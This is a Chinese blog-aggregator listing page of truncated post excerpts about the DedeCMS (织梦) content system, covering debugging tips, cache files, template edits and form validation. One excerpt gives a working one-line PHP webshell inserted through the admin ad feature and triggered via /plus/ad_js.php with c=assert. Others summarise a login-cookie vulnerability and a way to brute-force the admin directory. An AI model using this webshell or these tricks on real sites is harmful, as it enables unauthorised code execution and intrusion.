最近需要做几个企业站,所以呢,考虑了一下,没有用phpcms,而选择了 织梦。毕竟么,织梦用来做企业站还是比较合适的。好了,进正题: 在本地调试的时候,会非常的卡顿。调试的方法如下: 安装目录/data/common.inc.php 将localhost 改为 127.0.0.1 。 好了,去试试吧 ...
分类:
其他好文 时间:
2018-05-22 23:52:21
阅读次数:
231
重点文件在:/data/cache/inc_catalog_base.inc.php文件,里面存放的是栏目ID 先找到 /dede/sys_cache_up.php(后台更新缓存的地方),找到里面的UpDateCatCache();方法,然后跳转到UpDateCatCache();的所在页面:/de ...
分类:
其他好文 时间:
2018-05-18 15:32:53
阅读次数:
459
遇到一个被阉割的后台,发现直接传shell显然不行。 然后就有了下文 添加一个新广告。 插入一句话木马: 1 --><?php $_GET[c]($_POST[x]);?><!-- 然后访问: /plus/ad_js.php?aid=42&c=assert aid后面的值是你广告的id。 ...
分类:
系统相关 时间:
2018-05-15 22:37:51
阅读次数:
257
需要修改 /include/arc.archives.class.php (默认) 搜索 GetPreNext( 或 上一篇 找到 同样的 在 ...
分类:
其他好文 时间:
2018-04-06 23:51:27
阅读次数:
213
我的前后分离,不是api,不是ajax,我这里只讨论html与后端结合前话曾经风靡一时的dedecms相信做网站的十有八、九都知道,还有那么一些不是技术出生的人,通过看一下文档,也能访问出网站出来,有的人说dedecms太垃圾了,不知道是从哪些方面来说的,但不得不承认它的优势,又有哪个框架免费给你用,还这么方便的呢话说回来,dedecms的一大好处就是会模板标签,差不多就会慢慢的做套网页了,真的就
漏洞触发点在include/memberlogin.class.php中的MemberLogin类中的登录校验函数 可以看到M_ID参数是由GetNum(GetCookie("DedeUserId"))赋值的。 之后通过intval()函数对M_ID进行整数转换便没有再进行任何处理和过滤,然后通过S ...
分类:
其他好文 时间:
2018-03-23 10:29:43
阅读次数:
1667
打开 \include\arc.archives.class.php 1. 找到 $this->PreNext['pre'] = "上一篇:<a href='$mlink'>{$preRow['title']}</a> "; 改为 $this->PreNext['prem'] = "上一篇:<a h ...
分类:
移动开发 时间:
2018-03-05 16:03:13
阅读次数:
579
本文作者:红日安全团队——Mochazz 早上看了先知论坛的这篇文章:解决DEDECMS历史难题–找后台目录 不得不说作者思路确实巧妙,作者巧妙的利用了Windows FindFirstFile和织梦程序代码中对上传图片的逻辑判断,成功在Windows环境下爆破出后台目录。可能一些人不了解Windo ...
分类:
其他好文 时间:
2018-03-01 13:23:32
阅读次数:
234
dedecms 表单验证和验证码 一般表单都需要验证字段和防止恶意提交 1)验证字段: 找到项目根目录下的plus/diy.php,在59行有个if(!empty($dede_fields))这个判断里面就可以添加我们验证字段的代码了,示例: /*验证表单字段*/ if ($nickname == ...
分类:
其他好文 时间:
2018-02-27 21:25:00
阅读次数:
168
1.ps 链接: https://pan.baidu.com/s/1mjYbcJA(pqdt) 1.ps 链接: https://pan.baidu.com/s/1mjYbcJA(pqdt) 2.HTML5+CSS3从入门到精通.iso 链接: https://pan.baidu.com/s/1cU ...
分类:
其他好文 时间:
2018-02-23 14:05:09
阅读次数:
731
